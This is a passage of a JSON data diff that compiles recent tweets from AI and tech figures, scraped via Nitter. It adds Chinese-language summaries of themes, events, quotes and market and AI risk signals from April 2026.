"source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://nitter.net/eladgil/status/2046640542218604783#m", + "published_at": "2026-04-21T17:21:44+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.", + "url": "https://nitter.net/AravSrinivas/status/2046638770162995603#m", + "published_at": "2026-04-21T17:14:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://nitter.net/nomadicai/status/2046635685206208533#m", + "published_at": "2026-04-21T17:02:26+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://nitter.net/Geiger_Capital/status/2046632586735243420#m", + "published_at": "2026-04-21T16:50:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://nitter.net/HarryStebbings/status/2046614183513604299#m", + "published_at": "2026-04-21T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "⌘ ⌘", + "url": "https://nitter.net/AravSrinivas/status/2046606492649091212#m", + "published_at": "2026-04-21T15:06:26+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "RT by @morganhousel: I’m in love with this sentence:\n\n“The best math you can learn is how to calculate the future cost of current decisions.”", + "url": "https://nitter.net/readswithravi/status/2046429717834654025#m", + "published_at": "2026-04-21T03:24:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Whoa 🤯", + "url": "https://nitter.net/morganlinton/status/2046419556424675677#m", + "published_at": "2026-04-21T02:43:37+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://nitter.net/eladgil/status/2046375878368940239#m", + "published_at": "2026-04-20T23:50:03+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "", + "url": "https://nitter.net/AravSrinivas/status/2046347469488107839#m", + "published_at": "2026-04-20T21:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://nitter.net/ThomasOrTK/status/2046344875994739028#m", + "published_at": "2026-04-20T21:46:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。", + "url": "https://nitter.net/Svwang1/status/2046343776378257515#m", + "published_at": "2026-04-20T21:42:30+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。", + "url": "https://nitter.net/Svwang1/status/2046336504407142606#m", + "published_at": "2026-04-20T21:13:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://nitter.net/eladgil/status/2046300649483374704#m", + "published_at": "2026-04-20T18:51:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://nitter.net/eladgil/status/2046284381439103043#m", + "published_at": "2026-04-20T17:46:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://nitter.net/eladgil/status/2046284194943500453#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://nitter.net/eladgil/status/2046284191885922498#m", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://nitter.net/eladgil/status/2046284190132609299#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://nitter.net/eladgil/status/2046284188622737554#m", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://nitter.net/eladgil/status/2046284184877187540#m", + "published_at": "2026-04-20T17:45:42+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://nitter.net/soumithchintala/status/2046282944139215141#m", + "published_at": "2026-04-20T17:40:46+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "The Jensen + @dwarkesh_sp podcast was fantastic. \nJensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense how AI will actually diffuse into the world.\nIn this podcast, Dwarkesh came off as someone who picked up talking points from an AGI party in the SF Mission District.\nAnd the contrast was so evident.\nAs someone who understood ecosystems relatively deepy, maybe I understood Jensen's take more than others did (idk).\n\nMythos, that Dwarkesh kept bringing up, is not a single absolute turning point in the AI development landscape. Take a state-of-the-art Chinese open-source model, and give it three orders of magnitude more test-time compute + post-training algorithmic advances that haven't been published yet. That's the baseline. It was evident that in whatever bubble Dwarkesh is in, that is seen as a naive or illogical baseline.\n\nWhen AI has such a complex development cycle, it's evident that America needs many levers of policy intervention across multiple layers in a dominant ecosystem that ideally the Western world controls.\n\nThe entire premise that a particular model with AI development will have a critical phase change is neither correct nor does evidence point to it. OpenAI made this point with GPT-4, Anthropic made this point with Mythos, but neither stood / will stand the test of time.\n\nI think Jensen's repeated emphasis within the podcast to try to make this point mostly didn't get Dwarkesh's attention. And Dwarkesh (in this podcast) represents an entire cult of AI researchers and decision-makers that are going to influence policy.\n\nThe thing with policy interventions is that if you do too much too early, you shoot yourself in the foot. There's a good reason American foreign policy and general sanctions of all kinds are measured and continuous.\n\nDespite Jensen's attempt at educating the \"Anthro\" audience how ecosystems work, I'm also not super hopeful a lot of people who've taken the extreme position will change their thought after listening to this podcast. I do think there's a certain religiousness that has permeated some of that community that would make it hard to understand ecosystems at a deeper level.", + "url": "https://nitter.net/soumithchintala/status/2046265830908870983#m", + "published_at": "2026-04-20T16:32:46+00:00", + "source": "nitter" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 170 + }, + { + "title": "模型能力", + "count": 52 + }, + { + "title": "交易与市场", + "count": 15 + }, + { + "title": "投融资与并购", + "count": 13 + }, + { + "title": "算力与芯片", + "count": 8 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "GPT-5.5 来袭:AI 编程工具进入新阶段", + "subtitle": "从 Codex 到 Perplexity,AI Agent 正在重塑开发工作流", + "bullets": [ + "OpenAI 发布 GPT-5.5 和 GPT-5.5 Pro,CEO Sam Altman 称「几乎没有比看到开发者说我们的工具很有用更令人满足的事」", + "Perplexity 将 GPT-5.5 设为默认编排模型,预计可降低计算成本并提升用户体验", + "Sam Altman 暗示应重新思考操作系统和用户界面设计,认为需要一个让人和 Agent 都能使用的协议", + "Andrej Karpathy 参与构建「屏幕像素流」项目,AI 直接生成可视化界面而非 HTML" + ], + "samples": [ + { + "text": "we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.", + "url": "https://nitter.net/sama/status/2048755148361707946", + "handle": "sama", + "date": "2026-04-27" + }, + { + "text": "feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539", + "handle": "sama", + "date": "2026-04-26" + }, + { + "text": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator.", + "url": "https://nitter.net/AravSrinivas/status/2047788775468908840", + "handle": "AravSrinivas", + "date": "2026-04-24" + } + ] + }, + { + "id": "t2", + "title": "AI 原生工程团队:范式转移进行时", + "subtitle": "Andrew Ng 揭示 AI 驱动开发与传统团队的关键差异", + "bullets": [ + "Andrew Ng 定义「AI 原生」软件工程团队:使用编码 Agent 构建产品更快,催生全新运营模式", + "Gary Marcus 持续警告 AI Agent 过度炒作:称 vibe coding 为「十年间最大的骗局」,批评 Agent 可靠性不足以承担关键任务", + "Paul Graham 逆向思考:担心初创公司被模型公司吞噬就像「担心成为电影明星后生活会被限制」,失败概率远高于被吞噬" + ], + "samples": [ + { + "text": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate.", + "url": "https://nitter.net/AndrewYNg/status/2048793852702757151", + "handle": "AndrewYNg", + "date": "2026-04-27" + }, + { + "text": "The greatest con of the decade was calling autocomplete \"AI\". The second greatest is calling autocomplete-in-a-loop an \"agent\".", + "url": "https://nitter.net/atmoio/status/2048608025464705084", + "handle": "GaryMarcus", + "date": "2026-04-27" + }, + { + "text": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227", + "handle": "paulg", + "date": "2026-04-27" + } + ] + }, + { + "id": "t3", + "title": "美股估值逼近互联网泡沫水平", + "subtitle": "宏观信号:S&P 500 CAPE 比率创 2000 年以来新高", + "bullets": [ + "S&P 500 的 CAPE 比率上升至 41,创 2000 年以来最高水平,超越 99% 历史估值", + "S&P 500 年内第 9 次创历史新高,12.5% 的四周涨幅为 1950 年以来第 20 大增幅", + "S&P 500 已连续 13 个季度实现同比增长,一季度盈利同比增长 15%", + "Charlie Bilello:2026 年剧本与 2025 年相似,交易员对极端言论免疫,逢低买入推动市场快速反弹" + ], + "samples": [ + { + "text": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations.", + "url": "https://nitter.net/charliebilello/status/2048753179471323584", + "handle": "charliebilello", + "date": "2026-04-27" + }, + { + "text": "The S&P 500 ended the week at another all-time high, its 9th of the year.", + "url": "https://nitter.net/charliebilello/status/2048390341221404827", + "handle": "charliebilello", + "date": "2026-04-26" + }, + { + "text": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip.", + "url": "https://nitter.net/charliebilello/status/2048761760971096534", + "handle": "charliebilello", + "date": "2026-04-27" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI 与微软更新合作:可跨云部署", + "meta": "2026-04-27 | OpenAI", + "summary": "微软仍为主要云合作伙伴,但 OpenAI 现可支持全云部署,产品和模型可通过所有云服务商获取,合作延续至 2032 年。", + "url": "https://nitter.net/sama/status/2048755148361707946" + }, + { + "id": "p02", + "title": "GPT-5.5 全面登陆 API", + "meta": "2026-04-24 | OpenAI", + "summary": "Sam Altman 宣布 GPT-5.5 和 GPT-5.5 Pro 已在 API 中可用,Codex 应用同步更新:浏览器控制、Sheets/Slides、Docs/PDF、全系统语音、Auto-review 模式。", + "url": "https://nitter.net/sama/status/2047787124846653895" + }, + { + "id": "p03", + "title": "Perplexity 上线 Kimi K2.6", + "meta": "2026-04-23 | Moonshot/Perplexity", + "summary": "Moonshot 发布新版开源模型 Kimi K2.6,Perplexity Pro 和 Max 订阅用户已可使用。", + "url": "https://nitter.net/perplexity_ai/status/2047145172337836139" + }, + { + "id": "p04", + "title": "Y Combinator 法国受热捧", + "meta": "2026-04-27 | Paul Graham", + "summary": "Paul Graham 发布巴黎行照片,感慨法国对 Y Combinator 的热爱,并转发法国朋友深入了解 YC 的内容。", + "url": "https://nitter.net/paulg/status/2048704073356935676" + }, + { + "id": "p05", + "title": "AppLovin CEO 专访:450 人创造 $5.48B 收入", + "meta": "2026-04-26 | Harry Stebbings", + "summary": "AppLovin 市值 $160B,营收 $5.48B,每位员工创造 $10M EBITDA,利润率超 80%,Harry 称其为十年间最优秀 CEO 之一。", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537" + }, + { + "id": "p06", + "title": "VC 投资新方向:冻卵诊所与 AI 技能再培训", + "meta": "2026-04-27 | Harry Stebbings", + "summary": "Harry Stebbings 看好两个非科技投资领域:冻卵诊所(10 年内或成常态,高留存率、高利润率)和 AI 技能再培训设施。", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)", + "speaker": "Sam Altman", + "date": "2026-04-26", + "note": "对操作系统和互联网协议的反思,指向 AI Agent 时代的 UI 变革", + "url": "https://nitter.net/sama/status/2048428561481265539" + }, + { + "id": "q2", + "quote": "The greatest con of the decade was calling autocomplete \"AI\". The second greatest is calling autocomplete-in-a-loop an \"agent\".", + "speaker": "Gary Marcus", + "date": "2026-04-27", + "note": "对当前 AI 炒作的尖锐批评,认为 Agent 概念被滥用", + "url": "https://nitter.net/atmoio/status/2048608025464705084" + }, + { + "id": "q3", + "quote": "AI-native software engineering teams operate very differently than traditional teams.", + "speaker": "Andrew Ng", + "date": "2026-04-27", + "note": "AI 驱动开发团队与传统团队的核心差异定义", + "url": "https://nitter.net/AndrewYNg/status/2048793852702757151" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI 模型发布", + "subtitle": "模型能力迭代", + "level": "P0", + "items": [ + { + "text": "GPT-5.5 和 GPT-5.5 Pro 已在 API 可用", + "url": "https://nitter.net/sama/status/2047787124846653895" + }, + { + "text": "Perplexity 上线 GPT-5.5 作为默认编排模型", + "url": "https://nitter.net/AravSrinivas/status/2047753276888854595" + }, + { + "text": "Moonshot 发布 Kimi K2.6 开源模型", + "url": "https://nitter.net/perplexity_ai/status/2047145172337836139" + } + ] + }, + { + "id": "c2", + "title": "AI 编程工具", + "subtitle": "开发者工具生态", + "level": "P0", + "items": [ + { + "text": "Codex 应用更新:浏览器控制、Sheets/Slides、Docs/PDF、全系统语音、Auto-review", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694" + }, + { + "text": "OpenAI 开源 monitorability 评估工具", + "url": "https://nitter.net/bobabowen/status/2047473914528563592" + } + ] + }, + { + "id": "c3", + "title": "宏观市场数据", + "subtitle": "美股估值与盈利", + "level": "P1", + "items": [ + { + "text": "S&P 500 CAPE 比率达 41,创 2000 年来最高", + "url": "https://nitter.net/charliebilello/status/2048753179471323584" + }, + { + "text": "S&P 500 一季度盈利同比增长 15%,连续 13 季度正增长", + "url": "https://nitter.net/charliebilello/status/2048751094671585397" + } + ] + }, + { + "id": "c4", + "title": "AI 安全与风险", + "subtitle": "行业警示", + "level": "P1", + "items": [ + { + "text": "Gary Marcus:vibe coding 灾难频发,用户需保持备份习惯", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239" + }, + { + "text": "Gary Marcus:AI agents 是过早推出的技术,需关注安全问题", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827" + } + ] + }, + { + "id": "c5", + "title": "VC 与创业动态", + "subtitle": "投资风向", + "level": "P1", + "items": [ + { + "text": "AppLovin:$160B 市值、450 人、$10M EBITDA/人", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537" + }, + { + "text": "VC 新人攻略:90 天内每天给投资人推送 3 个 Deal", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920" + } + ] + }, + { + "id": "c6", + "title": "学术与研究", + "subtitle": "研究进展", + "level": "P2", + "items": [ + { + "text": "Jeff Dean 视频回放:Cloud Next 与 Amin Vahdat 等人的对话", + "url": "https://nitter.net/JeffDean/status/2048759102390899142" + }, + { + "text": "Perplexity 发布搜索增强训练论文:SFT + RL 提升搜索和引用质量", + "url": "https://nitter.net/perplexity_ai/status/2047016400292839808" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "AI Agent 可靠性风险", + "detail": "Gary Marcus 持续警告:vibe coded reasoners 灾难频发,用户未做好备份和监控导致数据丢失。AI agents 无法可靠遵守系统提示词中的规则。" + }, + { + "id": "r2", + "level": "HIGH", + "title": "美股估值过热", + "detail": "S&P 500 CAPE 比率创 2000 年来最高,超越 99% 历史水平。通胀持续高于美联储目标 61 个月,联储却仍在扩表(QE)。" + }, + { + "id": "r3", + "level": "MID", + "title": "Yann LeCun 再次质疑 LLM 路线", + "detail": "LeCun 转发评论称纯生成式架构(LLM/VLM/VLA)永远无法达到猫级智能,引发关于 LLM 局限性的大讨论。" + }, + { + "id": "r4", + "level": "MID", + "title": "政治极化影响科技圈", + "detail": "多位科技名人(Elon Musk、Jason Calacanis)持续发布政治相关内容,可能影响平台讨论质量和关注度。" + }, + { + "id": "r5", + "level": "OPP", + "title": "AI 编程工具快速迭代带来机会", + "detail": "GPT-5.5 上线、Perplexity 整合新模型、Codex 功能增强,对开发者是明确的机会窗口,可快速尝试新工具提升效率。" + }, + { + "id": "r6", + "level": "OPP", + "title": "AI 原生团队范式出现", + "detail": "Andrew Ng 定义的 AI 原生工程团队正在崛起,暗示新的组织方式和人才需求趋势,对投资和职业规划有参考价值。" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T16:26:46.682458+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 27 | **成功获取**: 21 | **推文总数**: 258\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(1 条)\n\n**[2026-04-22T16:00:05+00:00]**\n> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built…\n[原文链接](https://nitter.net/zan2434/status/2046982383430496444#m)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://nitter.net/sama/status/2048755148361707946#m)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://nitter.net/sama/status/2048751392031203544#m)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://nitter.net/sama/status/2048554097985593849#m)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://nitter.net/sama/status/2048552677433643427#m)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://nitter.net/sama/status/2048428561481265539#m)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://nitter.net/sama/status/2048426122854228141#m)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://nitter.net/SebastienBubeck/status/2048224374264885396#m)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://nitter.net/sama/status/2048165186482389253#m)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://nitter.net/sama/status/2048160448340767038#m)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://nitter.net/sama/status/2048160404376105179#m)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://nitter.net/sama/status/2048062261584077149#m)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://nitter.net/sama/status/2047823357635354814#m)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://nitter.net/sama/status/2047787124846653895#m)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://nitter.net/sama/status/2047683787828703289#m)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://nitter.net/bobabowen/status/2047473914528563592#m)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://nitter.net/sama/status/2047403771416940715#m)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://nitter.net/sama/status/2047395562501411058#m)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://nitter.net/sama/status/2047392357482639749#m)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://nitter.net/tszzl/status/2047386955550470245#m)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://nitter.net/ajambrosino/status/2047381565534322694#m)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(10 条)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://nitter.net/AravSrinivas/status/2047788775468908840#m)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://nitter.net/AravSrinivas/status/2047753276888854595#m)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://nitter.net/perplexity_ai/status/2047748486767272243#m)\n\n**[2026-04-23T02:46:57+00:00]**\n> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.\n[原文链接](https://nitter.net/perplexity_ai/status/2047145172337836139#m)\n\n**[2026-04-22T18:28:20+00:00]**\n> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c…\n[原文链接](https://nitter.net/AravSrinivas/status/2047019688920756504#m)\n\n**[2026-04-22T18:15:16+00:00]**\n> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an…\n[原文链接](https://nitter.net/perplexity_ai/status/2047016400292839808#m)\n\n**[2026-04-21T17:14:42+00:00]**\n> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.\n[原文链接](https://nitter.net/AravSrinivas/status/2046638770162995603#m)\n\n**[2026-04-21T15:06:26+00:00]**\n> ⌘ ⌘\n[原文链接](https://nitter.net/AravSrinivas/status/2046606492649091212#m)\n\n**[2026-04-21T02:43:37+00:00]**\n> RT by @AravSrinivas: Whoa 🤯\n[原文链接](https://nitter.net/morganlinton/status/2046419556424675677#m)\n\n**[2026-04-20T21:57:10+00:00]**\n> \n[原文链接](https://nitter.net/AravSrinivas/status/2046347469488107839#m)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(1 条)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://nitter.net/AndrewYNg/status/2048793852702757151#m)\n\n---\n\n### ✅ @ylecun — Yann LeCun(19 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://nitter.net/briantylercohen/status/2048469956627468510#m)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://nitter.net/Gianl1974/status/2048453901930660058#m)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m)\n\n**[2026-04-26T13:51:41+00:00]**\n> 